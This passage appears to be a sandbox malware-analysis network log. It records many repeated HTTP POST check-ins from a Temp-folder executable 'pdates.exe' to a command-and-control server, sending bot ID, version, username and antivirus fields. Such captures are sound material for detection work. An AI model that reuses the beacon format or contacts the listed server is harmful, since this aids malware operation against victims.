Jul 27, 2023 01:34:05.891391039 CEST	3788	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:05.939408064 CEST	3789	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:05 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
233	192.168.2.5	49953	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:06.119323015 CEST	3789	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:06.166902065 CEST	3790	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:06 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
234	192.168.2.5	49954	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:06.348823071 CEST	3790	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:06.397579908 CEST	3790	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:06 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
235	192.168.2.5	49955	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:06.569211006 CEST	3791	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:06.616894960 CEST	3791	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:06 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
236	192.168.2.5	49956	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:06.777622938 CEST	3792	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:06.825753927 CEST	3792	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:06 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
237	192.168.2.5	49957	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:07.018932104 CEST	3793	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:07.067229033 CEST	3793	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:07 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
238	192.168.2.5	49958	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:07.244652987 CEST	3794	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:07.292295933 CEST	3794	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:07 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
239	192.168.2.5	49959	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:07.456096888 CEST	3795	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:07.502933979 CEST	3795	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:07 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.5	49740	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:08.307898045 CEST	2857	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:08.359451056 CEST	2857	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:08 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
240	192.168.2.5	49960	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:07.660564899 CEST	3796	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:07.708261013 CEST	3796	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:07 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
241	192.168.2.5	49961	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:07.875684023 CEST	3797	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:07.922991991 CEST	3797	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:07 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
242	192.168.2.5	49962	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:08.082505941 CEST	3798	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:08.130517006 CEST	3798	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:08 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
243	192.168.2.5	49963	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:08.298031092 CEST	3799	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:08.345679998 CEST	3799	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:08 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
244	192.168.2.5	49964	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:08.504359007 CEST	3800	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:08.552969933 CEST	3800	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:08 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
245	192.168.2.5	49965	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:08.723388910 CEST	3801	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:08.772349119 CEST	3801	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:08 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
246	192.168.2.5	49966	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:08.939282894 CEST	3802	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:08.988142967 CEST	3802	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:08 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
247	192.168.2.5	49967	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:09.145159960 CEST	3803	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:09.193471909 CEST	3803	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:09 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
248	192.168.2.5	49968	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:09.375286102 CEST	3804	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:09.423567057 CEST	3804	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:09 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
249	192.168.2.5	49969	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:09.583251953 CEST	3805	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:09.633275986 CEST	3805	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:09 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.5	49741	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:08.528673887 CEST	2858	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:08.577079058 CEST	2858	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:08 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
250	192.168.2.5	49970	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:09.799637079 CEST	3806	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:09.848185062 CEST	3806	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:09 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
251	192.168.2.5	49971	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:09.997852087 CEST	3807	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:10.045610905 CEST	3807	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:10 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
252	192.168.2.5	49972	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:10.218684912 CEST	3808	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:10.362344027 CEST	3808	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:10 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
253	192.168.2.5	49973	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
